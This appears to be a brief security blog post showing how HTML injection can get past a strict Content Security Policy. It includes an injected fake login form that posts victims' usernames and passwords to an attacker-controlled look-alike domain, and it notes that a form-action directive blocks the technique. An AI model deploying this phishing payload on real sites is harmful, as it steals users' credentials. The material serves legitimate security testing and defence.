Bypassing CSP XSS Protection

Last Modified: Thu, 20 May 2021 16:17:41 +0000 ; Created: Thu, 20 May 2021 16:17:41 +0000

Ever had a vulnerable web application where you can inject HTML tags, but the Content Security Policy (CSP) stops your JavaScript from running? Sometimes the CSP can be worked around (a loose script-src, for example), but other times it is tight enough to block every script-based payload.

Bypass Solution

Since you can still get HTML into the page, consider injecting an HTML form, styled with CSS to impersonate the login page. The trick is that no JavaScript is needed: the form's action points at a server you control, which records whatever the victim submits. That server can then redirect the victim back to the real application so the login appears to have succeeded.

Two things to check before relying on this. First, CSP has a form-action directive that restricts where forms may submit, and it does not fall back to default-src, so a policy that omits form-action leaves submissions unrestricted even when script-src is locked down; if form-action is present and limited to 'self', this technique is blocked. Second, the inline style attribute below only works if style-src permits 'unsafe-inline'; if it does not, the form still submits, it just looks less convincing.

<!-- Injected into the vulnerable page. No <script> is used, so script-src is irrelevant;
     the style attribute is cosmetic and is dropped if style-src forbids inline styles. -->
<div style="height: 100%">
  <form method="POST" action="https://my.look-alike-domain.example.com/login.cgi">
    <label>Username:</label>
    <input type="text" name="username" /><br />
    <label>Password:</label>
    <input type="password" name="password" /><br />
    <!-- The attacker-controlled login.cgi stores both fields, then redirects to the real site. -->
    <input type="submit" />
  </form>
</div>